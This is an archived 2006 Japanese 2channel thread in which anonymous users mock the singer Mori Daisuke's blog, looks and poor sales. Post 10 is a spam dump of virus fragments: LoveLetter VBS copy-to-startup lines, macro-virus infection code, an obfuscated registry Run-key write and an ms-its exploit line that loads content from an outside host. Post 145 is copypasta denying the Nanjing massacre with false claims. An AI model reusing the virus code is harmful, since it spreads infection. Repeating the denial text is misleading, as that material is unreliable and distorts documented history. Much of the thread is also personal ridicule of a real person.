5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【いまいち】森大輔opus3【売れない】 

1 :NO MUSIC NO NAME:2006/07/03(月) 13:46:45 ID:DIRFt3vh
落ちてたので立てました
そのうち売れて、このスレタイを笑えるようになったらイイネ…

2 :NO MUSIC NO NAME:2006/07/03(月) 14:55:46 ID:jJqN+HWS
2ゲト

3 :誘導:2006/07/04(火) 02:09:40 ID:Ltmk08pU
【期待されてた】森大輔Part3【新人】
http://music5.2ch.net/test/read.cgi/musicjm/1151809825/

4 :NO MUSIC NO NAME:2006/07/04(火) 11:18:33 ID:cu+h3Avh
私こっちのスレタイの方が好きだな
あっちは嫌がらせ張り付いてるし
こっち来ようっと

5 :NO MUSIC NO NAME:2006/07/05(水) 18:31:28 ID:1Op2IMXB
それにしても、何で売れないんだろ

もっと売れセン狙いの曲書けばいいのかな
一度どかんと売れて注目集めちゃえば
個性強い曲出しても売れるんだよな


6 :NO MUSIC NO NAME:2006/07/05(水) 22:22:22 ID:CMaqcp2N
「隙間」作詞 森大輔、作曲 久保田利伸&森大輔。久保田が歌ってるの聴いたけどすごくいいね!森大輔の詞がいい‥

7 :NO MUSIC NO NAME:2006/07/06(木) 10:32:06 ID:0Kr1zhhF
http://www.hmv.co.jp/product/detail.asp?sku=1264066

8 :NO MUSIC NO NAME:2006/07/06(木) 15:07:54 ID:3JePkMBA
>>6
久保田のまだ聞いてないな
よさそげなのは想像できる

森タンの歌詞
なんか隙がないように感じるのは私だけ?

9 :NO MUSIC NO NAME:2006/07/06(木) 17:19:10 ID:DWnBfzDt
イイコちゃんな歌詞だよね
挫折とかしらなそうな


10 :NO MUSIC NO NAME:2006/07/06(木) 19:31:26 ID:R18O+cS2
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

11 :NO MUSIC NO NAME:2006/07/07(金) 00:44:08 ID:WmMQLS4v
好青年より挫折を知った人間の方が魅力的ではあるな



12 :NO MUSIC NO NAME:2006/07/07(金) 08:44:53 ID:pDnLb+qa
森風呂…テンションやたら高いコメつけるやついるなw
あのハーレム状態をみるにつけ、森タンもドン引きしてるんじゃないかと気の毒に思う俺がいる。


13 :NO MUSIC NO NAME:2006/07/07(金) 17:43:19 ID:OqQAppVJ
にゅうしんぐる
今度はどんな曲なんだらふ
楽しみと不安でどきどき

14 :NO MUSIC NO NAME:2006/07/08(土) 12:11:04 ID:wu2fxTF0
メロディラインがスティービーちっくで好きなんだけど
歌声の幼さがネックで売れないんじゃないかな
厨房が歌ってるかとオモタよ


15 :NO MUSIC NO NAME:2006/07/08(土) 12:56:29 ID:2cwa6SHY
>>12
コメ欄も痛いが森本人もかなり痛いぞ
この人いつも一言余計
>慌ててというわけではありませんがCDの紹介〜
→慌ててないなら慌ててというわけではない等と書かなければ良い

>一見すると何かわからない箱〜うんぬん
→どう見てもリズムボックスやろ
なんでレトロなリズムボックスですが〜と素直に書けないんだろ

説明くどいし場にそぐわない余計な一言をそえる特徴あり
そやからラジオ聞いててもイライラしたんやわ


16 :NO MUSIC NO NAME:2006/07/10(月) 22:21:07 ID:9RTGUxYn
あ〜なんか小ウルサイ感じだなと感じてたけどそういうことか
顔はカワイイのに損してるね


17 :NO MUSIC NO NAME:2006/07/11(火) 01:33:57 ID:6R0pwtaf
顔の話題になると大変めんどくさい流れになりますので注意w

18 :NO MUSIC NO NAME:2006/07/11(火) 10:31:15 ID:QOSu9g8+
それは川嶋あいに似ているからですか?

19 :NO MUSIC NO NAME:2006/07/11(火) 20:13:44 ID:EbK5TTnx
公式開くたびにイントロ流れるからさすがに秋田

20 :NO MUSIC NO NAME:2006/07/12(水) 00:18:15 ID:fUWpKrI8
ファンミーティングってw
普通にBBSで良いじゃん。韓流?って思ったw

21 :NO MUSIC NO NAME:2006/07/12(水) 00:29:38 ID:9OAidasi
1分前に更新するようなデイリーブログなんてとっととヤメちまえ!

22 :NO MUSIC NO NAME:2006/07/12(水) 12:18:40 ID:EeCECYvf
あきらかに韓流狙ってるぽい
だて眼鏡とかも
なんか嫌

23 :NO MUSIC NO NAME:2006/07/12(水) 22:31:49 ID:3d/ZaUmk
好きだったのに
ラジオ聞いたりブログ読んだりするたびに嫌悪感が…
こんな風に感じるアーティストはじめて
何が悪いのかいまいちはっきり分からないけど
多分、心の底でどこか人を見下してるのを感じてしまうからなんだと思う


24 :NO MUSIC NO NAME:2006/07/12(水) 22:34:58 ID:Af+KFPZz
ラジオ聴いても何とも思わないけど一部ファンがキモイ。

25 :NO MUSIC NO NAME:2006/07/13(木) 00:28:13 ID:4wBN1M6s
自分もラジオ聴いてもなんとも思わないw

26 :NO MUSIC NO NAME:2006/07/13(木) 00:40:33 ID:O4F0QAa5
>>23
ちょww 劣等感持ちすぎww 見下してることはないと思うけど、
そうやって思われてしまう以上は、何か問題があるんだろうな。

>>24
まぁ、そういう意見をお持ちの方がここに来てるわけでw

27 :NO MUSIC NO NAME:2006/07/13(木) 03:35:57 ID:TvN1bJEE
劣等感じゃないと思うな
私も同じように感じたから。
自分に自信持ちすぎてる子って知らず知らずに人を見下してるとこあるんだよね
そういう臭いが森タンからはぷんぷんするわ。

28 :NO MUSIC NO NAME:2006/07/14(金) 01:15:25 ID:VZsx+Ayp
前スレでも森のリスナーを馬鹿にしたしゃべり方に非難集中したことあったな
その時だけはぐんぐんスレが伸びたっけw
普段過疎ってるのにさ


29 :NO MUSIC NO NAME:2006/07/14(金) 10:56:21 ID:F31eHo4N
そうそう
あの時は記録的に伸びたなあw

売れないのは
AOR歌うには声がガキすぎるんだよ
歌詞も幼いし


30 :NO MUSIC NO NAME:2006/07/14(金) 12:02:38 ID:b3t2m+76
それでもここにいる人は森タソが好きなんだ?

31 :NO MUSIC NO NAME:2006/07/14(金) 14:35:14 ID:AbUoUMw8
まぁ、青田買いだな。

32 :NO MUSIC NO NAME:2006/07/14(金) 23:41:20 ID:uYwvSxFI
私はヲチ組
好き嫌いで二分すんなって

33 :NO MUSIC NO NAME:2006/07/15(土) 00:15:27 ID:rfcjAF44
いつ二分したんだろ。
相変わらず変な人いるな。

34 :NO MUSIC NO NAME:2006/07/15(土) 01:15:11 ID:b6M5yroC
はよ、60レス超えんかな。ノートン先生が>10に反応してうざい。

35 :NO MUSIC NO NAME:2006/07/15(土) 04:20:16 ID:RNF4+vUw
>>33
オラオラ馬鹿は発言すんなってw

好き嫌いを持ち出した時点でニ極化的思考まるだしだろうよ
分からないわけ?


36 :NO MUSIC NO NAME:2006/07/16(日) 12:28:40 ID:uHdwUI+D
馬鹿だから「二分する」の意味すらわかってないんじゃない?w

37 :NO MUSIC NO NAME:2006/07/16(日) 14:59:33 ID:+kVD0ZW0
森風呂7/11
>あまりにもフレッシュではありません

文法間違いもいいとこw
言葉知らないくせに色々使いたがるからこういう恥をかくw

38 :NO MUSIC NO NAME:2006/07/17(月) 00:04:39 ID:VvIQR+nT
あ、ほんとだw

39 :NO MUSIC NO NAME:2006/07/17(月) 00:50:58 ID:yOUrzSMg
>>34
専ブラ使えば無問題

40 :NO MUSIC NO NAME:2006/07/18(火) 13:18:56 ID:StsIylph
メガネ…
アンジェラアキにあやかりたいのかしら


41 :NO MUSIC NO NAME:2006/07/19(水) 15:35:55 ID:+hvIi//B
似合ってないよね
顔がメガネに負けてるもん

42 :NO MUSIC NO NAME:2006/07/21(金) 15:13:11 ID:DeVs3WNw
浅田ジローか
俗っぽい本読んでんな

43 :NO MUSIC NO NAME:2006/07/22(土) 00:05:38 ID:GMw479k7
浅田次郎にはちょっとガガリ


44 :NO MUSIC NO NAME:2006/07/22(土) 05:22:22 ID:JQfL+Vh9
詳しく

45 :NO MUSIC NO NAME:2006/07/22(土) 10:37:12 ID:OQQz2ynP
〜春樹と浅田好きな性格判断〜
ナルで面倒な性格で理論より人情に流されやすいオヤジ系
恋愛では、恋愛中の自分にいちばん興味があるタイプ


ま、ほぼあっているような…w


46 :NO MUSIC NO NAME:2006/07/22(土) 10:44:50 ID:T65mVJzx
ツッパル事が男の〜たった一つの勲章〜

47 :NO MUSIC NO NAME:2006/07/24(月) 10:27:30 ID:21XM2N/i
ライブ感のあるステージ

なにこれw
ライブやるんだからライブ感あるの当たり前じゃん
色々言葉使いたがるワリに言葉の意味分かってないね
森風呂で馬鹿を露呈する結果になってるわ

48 :NO MUSIC NO NAME:2006/07/26(水) 09:15:46 ID:PVCGGqji
森君てもっとかしこい人かと思ってたけど…
かしこく見せたいがために言葉を余計に重ねていくタイプだと分かり興味が失せました
見栄ッパリはキライなんです私
そういう人の歌を心に入れたくないと思うから
ByeBye森君

49 :NO MUSIC NO NAME:2006/07/27(木) 00:11:55 ID:BQ6wPzzD




 森 ブ ロ グ 毎 日 連 続 更 新 終 了






50 :NO MUSIC NO NAME:2006/07/28(金) 10:02:55 ID:AB3uGUFi
>>48
気付くの遅いww

51 :NO MUSIC NO NAME:2006/07/30(日) 21:05:27 ID:m4swB+JI
もうちょっとスッキリしてほしいよね
しゃべりも
文章も


52 :NO MUSIC NO NAME:2006/08/01(火) 21:24:09 ID:JxH8lPsg
森クンはおぼっちゃま育ちだからプライド高くてもしょうがないよ。

53 :NO MUSIC NO NAME:2006/08/02(水) 10:00:30 ID:HHYB1MeI
プライドと見栄っぱり
意味違うんだけどw

アフレコ写真
左手が…w
主題歌うたってるから販促のためにサービスで出させてもらってんのに
プロ声優気取りの森タン…w

54 :NO MUSIC NO NAME:2006/08/03(木) 08:55:14 ID:lmczZZkh
チャリで遠出の話
めずらしくすっきりした書き方だったじゃん
写真は…まあ、今更いいか。

55 :NO MUSIC NO NAME:2006/08/04(金) 09:41:35 ID:GhRQDOc9
なんか森風呂のヲチスレになってきたようなw
他に話題ないしつっこみ所満載だから仕方ないか
クライマーズハイはオモシロイ
やっとまともな本を読みはじめたことに乾杯

56 :NO MUSIC NO NAME:2006/08/04(金) 16:18:07 ID:4RVFpbbE
まともかどうかも読んでみなけりゃ分からないわな

57 :NO MUSIC NO NAME:2006/08/05(土) 08:11:52 ID:Db9+/Lv7
↑ハイハイwお前は自分が読んでから書けや


58 :NO MUSIC NO NAME:2006/08/07(月) 14:28:35 ID:+/pHMRq+
クライマーズならまずまずだな
つか、ラジオもブログも気持ち悪いほどのハーレム状態


59 :NO MUSIC NO NAME:2006/08/08(火) 15:16:54 ID:YZ2pWNV1
すんません
ハーレムの一員っす
最近新規ファンが増えて
そういう人のメッセージの方が読まれちゃうわけ
きーっ!悔しい!
昔からのファンとしてはメッセージを読んでもらいにくくなったから必死よ
目立つ工夫もアレコレしなきゃ


60 :NO MUSIC NO NAME:2006/08/08(火) 22:56:11 ID:CE9weiSD
>>59

    /\___/ヽ   ヽ
   /    ::::::::::::::::\ つ
  . |  ,,-‐‐   ‐‐-、 .:::| わ
  |  、_(o)_,:  _(o)_, :::|ぁぁ
.   |    ::<      .::|あぁ
   \  /( [三] )ヽ ::/ああ
   /`ー‐--‐‐―´\ぁあ

61 :NO MUSIC NO NAME:2006/08/08(火) 23:45:46 ID:2pNQvnC7
メガネ外す気ないのか・・・外せよ。

62 :NO MUSIC NO NAME:2006/08/09(水) 00:40:29 ID:hzDAeSAg
アタシもハーレム構成員か
目立つ工夫ねぇ
とにかく必死にメッセージ書くのは一緒
負けたくないし
でも、いざ読まれた時の森君の反応がいまいちというか
もっと気を利かせたコメントしろよ!といつも思う
あんまし頭良くないのかも

63 :NO MUSIC NO NAME:2006/08/09(水) 01:20:45 ID:O2sXJmTK
頼むからハーレム構成員は巣(公式)に帰れ

64 :sage:2006/08/09(水) 20:55:59 ID:7RCpJtPN
メガネかけた顔、虫みたいだから
正直やめてほしい

65 :NO MUSIC NO NAME:2006/08/10(木) 16:23:50 ID:lH6eK7Uv
いやいや、ハーレムさんに遊びにきてもらうのも一興ですよ
意外に悪口落としていかれるし
本音が書きやすいんでしょうねここは

66 :NO MUSIC NO NAME:2006/08/12(土) 01:02:57 ID:ZBRnAjXT
虫みたいって…ぷ
言い得てる



67 :NO MUSIC NO NAME:2006/08/12(土) 13:28:42 ID:2cTmB5hd
女ばっかに囲まれた写真を貼るなんて、芸能人としての知恵や才能まったくないな。


68 :NO MUSIC NO NAME:2006/08/12(土) 21:21:15 ID:B0UaJCF4
眼鏡かけてる理由かどうかはわからんが、
年末か今年の初めに目の手術受けたらしいよ。
聞いた話だけどさ。

69 :NO MUSIC NO NAME:2006/08/13(日) 03:29:42 ID:7Ry6yaq2
自分の顔の写真映りが嫌で
伊達めがねかけたら周りに評判いいし
しばらくはめがねでいく!って森タン自身が言ってたわけ


70 :NO MUSIC NO NAME:2006/08/13(日) 21:34:40 ID:P3JRXI50
>>68は森君の友人から聞いたんだが。
まあたぶん信じて貰えないだろうけど。

71 :NO MUSIC NO NAME:2006/08/14(月) 09:43:47 ID:JArbcYUg
ハーレムさん、ラジオにハガキ出してこの噂の真相聞いてくれや。
誰がこのスレ見てるのか分かってしまうけどww

72 :NO MUSIC NO NAME:2006/08/14(月) 23:09:36 ID:ky3p3GdL
整形したとか?ww
視力治療して伊達メガネだとしたら
そこまで顔に自信ないのかとおもわれ
ちょっと不憫だわな・・・。でも自信家なんだなこれがw

73 :NO MUSIC NO NAME:2006/08/15(火) 00:37:37 ID:UBu6+1H5
>>48
aho

74 :NO MUSIC NO NAME:2006/08/15(火) 01:30:05 ID:w8idLVdx


75 :NO MUSIC NO NAME:2006/08/15(火) 01:46:02 ID:F7Mm/HwD
そう、すごい自信家だよね


普段の僕チンもっとイケてるのになんでこんな顔にうつってるんだ〜!僕チンのプライドが許さない!そうだ眼鏡でかくしてやろう!僕チン頭いい〜



76 :NO MUSIC NO NAME:2006/08/19(土) 21:37:16 ID:J+xaX/E8
age

77 :NO MUSIC NO NAME:2006/08/25(金) 00:26:18 ID:+vb4fp/W
新規だけど、ここのスレみたらなんかへこんだ(´・ω・`)
私森君眼鏡似合ってると思うけどなー。

78 :NO MUSIC NO NAME:2006/08/25(金) 17:34:46 ID:oQheWS1G
誰かを適当に貶して日頃のストレス発散させたい奴らばかりだから気にすんな。

79 :NO MUSIC NO NAME:2006/08/26(土) 17:11:23 ID:oS8l2pPs
どこが似合ってんの?
変なのはあんたの審美眼だろw

80 :NO MUSIC NO NAME:2006/09/04(月) 15:50:00 ID:dQ2AJep+
森タソのラジオ今月いっぱいで打ち切り?

81 :NO MUSIC NO NAME:2006/09/04(月) 21:00:20 ID:MzPp5nn3
うん

82 :NO MUSIC NO NAME:2006/09/05(火) 00:38:33 ID:2ju1+8pH
工エエェェ(´д`)ェェエエ工

83 :NO MUSIC NO NAME:2006/09/05(火) 21:17:59 ID:jGvVb/9U
えぇぇっ!?マジで?

84 :NO MUSIC NO NAME:2006/09/05(火) 21:48:27 ID:MVt02Eze
うん

85 :NO MUSIC NO NAME:2006/09/05(火) 22:34:09 ID:jGvVb/9U
森タン・・・

86 :NO MUSIC NO NAME:2006/09/11(月) 22:38:11 ID:8A7HIvvk
パチパチの連載も今回で最終回だった・・・

87 :NO MUSIC NO NAME:2006/09/14(木) 01:04:01 ID:bKMdRtvD
そして伝説へ…

88 :NO MUSIC NO NAME:2006/09/14(木) 23:36:26 ID:BvT9xNbK
>>87
どういう事?

89 :NO MUSIC NO NAME:2006/09/19(火) 09:28:20 ID:3sB0DEVx
ドラクエか

90 :NO MUSIC NO NAME:2006/09/20(水) 20:29:50 ID:xweECVwb
ラジオやっぱり今月で終了なのか・・・
でも全プレサイン貰ったしいいかw

91 :NO MUSIC NO NAME:2006/09/21(木) 19:18:15 ID:zMahSG7P
このスレも今日を持って最終回だそうです。


92 :NO MUSIC NO NAME:2006/09/25(月) 13:00:13 ID:vjXYkqto
age

93 :NO MUSIC NO NAME:2006/09/27(水) 00:02:28 ID:kCOGiVPk
森タソ乙カレー

94 :NO MUSIC NO NAME:2006/09/27(水) 00:16:19 ID:OoYfqPHx
終わっちまったな…

95 :NO MUSIC NO NAME:2006/09/27(水) 01:36:13 ID:8swE3try
軽〜くあっさり終わったな

96 :NO MUSIC NO NAME:2006/10/01(日) 21:51:43 ID:GuQ3D9Ec
新曲どうなの?

97 :NO MUSIC NO NAME:2006/10/02(月) 23:32:38 ID:rcx/KkjE
ファンミーティング香ばしすぎる

98 :NO MUSIC NO NAME:2006/10/03(火) 16:15:17 ID:2fxIlM8t
同じく売れない別森に来い

99 :NO MUSIC NO NAME:2006/10/03(火) 17:55:48 ID:zbszQTc7
>>97 同感。イタ杉。

100 :NO MUSIC NO NAME:2006/10/04(水) 10:41:58 ID:81R+Wd4H
ファンミーティングの流れに水がさされたようだ

101 :NO MUSIC NO NAME:2006/10/16(月) 15:49:37 ID:CXMK0OVR
すっかり過疎ってるwww
今知ったんだけどザ・ワイドのエンディング森タソの曲になったんだね。

102 :NO MUSIC NO NAME:2006/10/16(月) 23:29:02 ID:vzCO3N+w
・・・

103 :NO MUSIC NO NAME:2006/10/17(火) 18:54:08 ID:fz7HUvDe
そういや日テレとの関わりが多いね。

104 :NO MUSIC NO NAME:2006/10/18(水) 17:45:56 ID:AnGhuIPW
http://www.gyao.jp/sityou/catedetail/contents_id/cnt0022525/

105 :NO MUSIC NO NAME:2006/10/20(金) 22:05:22 ID:w9UZC+uk
ワイドショーのエンディングじゃなあ・・・
おばさん食い付くか?

106 :NO MUSIC NO NAME:2006/10/20(金) 23:50:21 ID:nCTZLq86
どの番組にも言えるけどエンディングなんて誰も聞いてない

107 :NO MUSIC NO NAME:2006/10/22(日) 00:41:11 ID:X7LFHJxF
映画「怖い女」の主題歌とかSMAPの新曲のカップリング曲の編曲とコーラスやってるな。

108 :NO MUSIC NO NAME:2006/10/23(月) 13:43:53 ID:tKYeMWOb
キンキのも作詞作曲してる

109 :NO MUSIC NO NAME:2006/10/23(月) 20:40:09 ID:6wRua0gj
wiki
ttp://ja.wikipedia.org/wiki/%E6%A3%AE%E5%A4%A7%E8%BC%94_%28%E3%82%B7%E3%83%B3%E3%82%AC%E3%83%BC%E3%82%BD%E3%83%B3%E3%82%B0%E3%83%A9%E3%82%A4%E3%82%BF%E3%83%BC%29

110 :NO MUSIC NO NAME:2006/10/24(火) 21:09:27 ID:FY7xu7fE
デスノート見てたらCM流れてビックリした。
ってか何だあれ

111 :NO MUSIC NO NAME:2006/10/24(火) 22:50:44 ID:TxFGOAQC
森大輔って、三菱ふそう川崎のヤツ?
横浜自由獲得枠で入ったけど、1試合の登板も無いまま、
戦力外になった、国際試合での登板もあったのに、可哀想だったね。

112 :NO MUSIC NO NAME:2006/10/24(火) 23:16:09 ID:Eg+d+vkZ
違うw

113 :NO MUSIC NO NAME:2006/10/27(金) 09:09:31 ID:05JsvzKI
人形浄瑠璃が鬼の顔になるところにはほんとびっくりした…

114 :NO MUSIC NO NAME:2006/10/27(金) 21:48:22 ID:n0vfZNYp
>>113
夢に出そうw

ラストの目を閉じる部分はすごく美しい。

115 :NO MUSIC NO NAME:2006/10/30(月) 16:12:01 ID:zjXVf3DD
久保田とくっつけてよかったな

116 :NO MUSIC NO NAME:2006/10/30(月) 22:17:49 ID:GSWWRKRb
森君が久保田ファンだからね。

117 :NO MUSIC NO NAME:2006/10/30(月) 23:54:29 ID:UN3L2/Z9
久保田、森くんに太鼓判押してるし。

118 :NO MUSIC NO NAME:2006/11/02(木) 00:58:51 ID:LiGfC4U7


119 :NO MUSIC NO NAME:2006/11/02(木) 02:08:39 ID:8A5mujyD
ブログやってんだ

赤レンガ倉庫、渋谷でショッピング、ね・・・

ベタなデートやってんだなw

120 :NO MUSIC NO NAME:2006/11/04(土) 14:06:34 ID:iIhH3bHr
moribloに書き込みしてる「れっつぐるーぶ」ってどうにかなんないのか?
一度見てみたい…

121 :NO MUSIC NO NAME:2006/11/04(土) 18:26:01 ID:AxSDewmC
福島県郡山市に行けば会えるよw

122 :NO MUSIC NO NAME:2006/11/04(土) 22:05:57 ID:idb5iSH2
森大輔
***,*** *** 06.06.21 Our Song
***,482 175 06.10.25 Crazy' bout you

482枚で175位だってさ

123 :NO MUSIC NO NAME:2006/11/05(日) 23:58:05 ID:peUHiTCy
公式で「かなり数が少ないです!」って煽ってる眼鏡ストラップ
地元じゃゴロゴロ余ってるんだけど


けっこうあるよね? 他の実施店でも

124 :NO MUSIC NO NAME:2006/11/06(月) 18:08:03 ID:L8+XDAIN
とゆーかショボいストラップだなw

125 :NO MUSIC NO NAME:2006/11/09(木) 14:18:36 ID:cYzHcmBY
moriblo、彼女にとってもらってる写真なんかのっけるなや('A`)

126 :NO MUSIC NO NAME:2006/11/09(木) 17:18:09 ID:AKuRBjG5
>>125 自分も思った

ハーレムどもは喜んでるが
おまいらのための笑顔ではない
彼女の前だからあの笑顔なんだよ('A`)

127 :NO MUSIC NO NAME:2006/11/09(木) 21:09:05 ID:bdW0AMU4
彼女日本の西方在住なはずだが・・・。

128 :NO MUSIC NO NAME:2006/11/09(木) 22:20:09 ID:LCWT8jL7
それって大学時代からの彼女のことだろ?
それか、もう別れたんか?

129 :NO MUSIC NO NAME:2006/11/16(木) 21:03:00 ID:+/SQml1a
>>105
…ごめん、食いついた。かなり脳内でまわってる。
by三十路主婦

130 :NO MUSIC NO NAME:2006/11/18(土) 10:42:34 ID:BM6FdsEJ
>>127 >>128
詳細キボンヌ

131 :NO MUSIC NO NAME:2006/11/18(土) 17:46:07 ID:0l45Epkp
どっかで新曲フルに聴けるとこないの?
こないだラジオで聞いて気になってるんだが、ヤフーのはもう聞けないし・・・

132 :NO MUSIC NO NAME:2006/11/19(日) 15:48:40 ID:GV5jJ91c
CD買え

133 :NO MUSIC NO NAME:2006/11/19(日) 17:58:32 ID:ep70dLGd
>>131
CD買って

134 :NO MUSIC NO NAME:2006/11/19(日) 18:54:38 ID:l/6HMQNO
いや・・・ もう一度聞いてからどうしようかなと思ってね。
レンタルでいいや(´_ゝ`)

135 :NO MUSIC NO NAME:2006/11/20(月) 21:51:21 ID:ig4/vEew
森大輔のメールマガジンって登録してる?
登録しても全然メールこないから、登録失敗したのかと
思って何回かやり直したんだけど…
『このプレゼントはすでに応募済みです』って出るよ
皆はメール届いてる?かれこれ1年くらい経つけど私だけ?

136 :NO MUSIC NO NAME:2006/11/21(火) 00:52:05 ID:EaIPKxJN
届きまくりでうざいくらい

137 :NO MUSIC NO NAME:2006/11/21(火) 10:45:08 ID:bj5cgQw/
>>136
ありがとう。そうなんだ…問い合わせてみようっと

138 :NO MUSIC NO NAME:2006/11/22(水) 14:15:34 ID:KRKuzE+i
>>135
CDの帯のアドレスはアンケートのアドレスだから、
オフィにあるメルマガのアドレスに送信しないとダメだよ。
携帯のアドレスなら受信設定しないととどかないよ〜

それにしても「れっつぐるーぶ」はどうにかならんのか?

139 :NO MUSIC NO NAME:2006/11/22(水) 19:30:54 ID:QUiW3wpZ
>>138
ありがとう。オフィから携帯で登録しようとしてたんだけど
前書いた通りの状態なんだ。問い合わせのメール送ってみたけど
返事こないし…。個人的なことでスレ汚してごめんなさい。
失礼しました。

140 :NO MUSIC NO NAME:2006/11/22(水) 22:21:03 ID:yzW+ib7v
>>138 どうにもなんねーよ

141 :NO MUSIC NO NAME:2006/11/23(木) 08:34:41 ID:hUShESrP
れっつぐるーぶって何のことかと思ったらコメントつけてる人か。
コメントなんて読まないからどうでもいい。

142 :NO MUSIC NO NAME:2006/11/23(木) 10:00:53 ID:CrgoPsju
>>141
俺は「れっつぐるーぶ」しか読んでないw 

143 :NO MUSIC NO NAME:2006/11/28(火) 19:05:58 ID:sp4AZx/C
・米国の大手ネット企業AOLのテッド・レオンシス副会長(50)が、南京事件(1937年)に
 取材した映画「南京」(仮題)を制作し、年明け以降、発表する。ドキュメンタリー作品の体裁だが、
 史実の認定は反日的な歴史観で知られる中国系米国人作家、故アイリス・チャン氏の
 「レイプ・オブ・南京」を踏まえているとされる。公開されれば来年70周年を迎える同事件や
 歴史問題をめぐり、日本の国際的立場に深刻な影響を与える可能性もある。

株式会社ワーナーミュージック・ジャパンの不買運動を行いましょう


144 :NO MUSIC NO NAME:2006/11/29(水) 22:47:14 ID:N5bvHdQM
れっつぐるーぶ万歳!

145 :NO MUSIC NO NAME:2006/12/01(金) 01:02:27 ID:i+ShHnd6
★南京大虐殺の嘘

 「南京戦」という一般的な局地戦があったのは史実だが
 「大虐殺」などというものは存在しない。
 南京大虐殺とは東京裁判のために作られたフィクションである。

【普通にオカシイ】
・原爆被害者ですら数十万人なのに『一軍隊が30万も殺害』するのは不可能。
・そもそも『20万人しか居なかった街で30万人』が殺されるわけがない。
・仮に南京市に30万人がいたとして、それだけの人数が順番待ちでもしてたかのように
 『30万人全員が逃げずに殺される』などという話は現実的にはありえない。
・避難中の民が急に『戦闘地区に戻って来て』死者数が30万に増加など論外。
・30万人虐殺の一ヵ月後に『30万人が街に帰ってきたから人口が元に戻った』
 という中国の主張は不自然で整合性に欠ける。
・死んだはずの南京市で、元の人口相応数の子孫が生まれている。
・中国政府が『30万人は政治的数字だから変更できない』と公言したことが
 ある。中国国内の政治的数字など日本には知ったことではない。
・『大虐殺』の定義が不明。南京戦という局地戦における戦死者でまともに
 確認されたのはせいぜい2000人と一般戦闘並み。それを『大』とするなら
 妥当な規模ではないし、『虐殺』とする証拠も一切ない。つまり解決済みの
 一戦闘をことさら取り上げて日本を攻撃する『事件性がない』。
・日本軍に虐殺動機が全くない。
・物資不足で敗戦を余儀なくされた日本が、敵軍に急襲されかねない緊迫した
 状況下で弾薬を無駄にしてまで一般人を『遊興で30万殺害する説』など異常。
・虐殺後に減るならわかるが『逆に南京の人口が急増してることが不自然』。
・なぜか被害者数が年々『水増し』されている。
・「南京全市民は約20万人が全員無事だった」と、現地の安全区国際委員長から
 日本軍に感謝状が出されている。
・市民が避難した安全区に逃げ込んで一般市民の衣服を奪って武器を隠し
 持って日本を騙し撃ちする卑怯な兵隊を「便衣兵」というが、これらを
 捕まえて処刑するのは戦時国際法において合法な“戦闘行為”であり
 虐殺ではない。これを虐殺というのは逆恨みでしかない。
・「中国政府の意向に沿った記事を書くこと」を宣言した朝日新聞の自虐的な
 贖罪キャンペーンを受けて、戦後33年も経ってから日本の中学校教科書に
 突然『中国の教科書にさえ載ってなかった大虐殺』が登場することが不自然。
・日本の『敵国である外国人カメラマン』もたくさん南京市に取材に行って
 いたのに『虐殺写真が一枚も撮られていない』。存在しないものは撮れない。
・河に流しても燃やしても痕跡が残るはずの『30万人もの死体が完全に
 行方不明』。何の痕跡もなく人が消えるなどありえない。

146 :NO MUSIC NO NAME:2006/12/02(土) 01:11:23 ID:SzALmb7d
もう「ぐるぶろ」に変えたらいいのにw
圧倒的に森君の書く日記より、れっつぐるーぶの書くコメントの方が面白いw

147 :NO MUSIC NO NAME:2006/12/02(土) 01:45:47 ID:/YWY1Bvq
>>146
最初は「なにコイツ?!」って感じだったけど
今じゃ「れっつぐるーぶ」のコメントが待ち遠しいw
確かに森君の日記って小学生の絵日記以下につまんないとこあるよね

148 :NO MUSIC NO NAME:2006/12/02(土) 18:56:51 ID:Ij2DLejQ
>>146
森を奉るハーレムばかりの森風呂に新星誕生
そのカリスマ性でこのまま突っ走ってくれ

>>147
森風呂がつまらないのは仕方ないよ
しょせん爽やかさがウリだけの坊ちゃまブログ
読めば読むほど「たいしたこと考えてないんだなー」と鼻白む

149 :NO MUSIC NO NAME:2006/12/06(水) 10:54:54 ID:DxrvLTw9
ティッシュにアロマオイルを垂らしてハァハァしているれっつぐるーぶwww

ラリってるから変な書き込みなのか?

150 :NO MUSIC NO NAME:2006/12/07(木) 00:26:50 ID:5L0xmEwd
>>149
強めの抑鬱剤や眠剤とか常用してると、飲んだ後は誰でも結構ああいう感じなるね。
でもいつもコメント深夜って訳じゃないからなぁ。

更新キタ。そして今夜はもぐるーぶ待ち。
ネガティブネタだから期待できるんじゃないかw

151 :NO MUSIC NO NAME:2006/12/08(金) 22:02:18 ID:Nr4ex1zu
日本人なの?れっつぐるーぶさん。

152 :NO MUSIC NO NAME:2006/12/20(水) 01:09:42 ID:s5rsiWIe
ここ淋しいな…
ageておく

153 :NO MUSIC NO NAME:2006/12/20(水) 22:10:23 ID:WgpwygSh
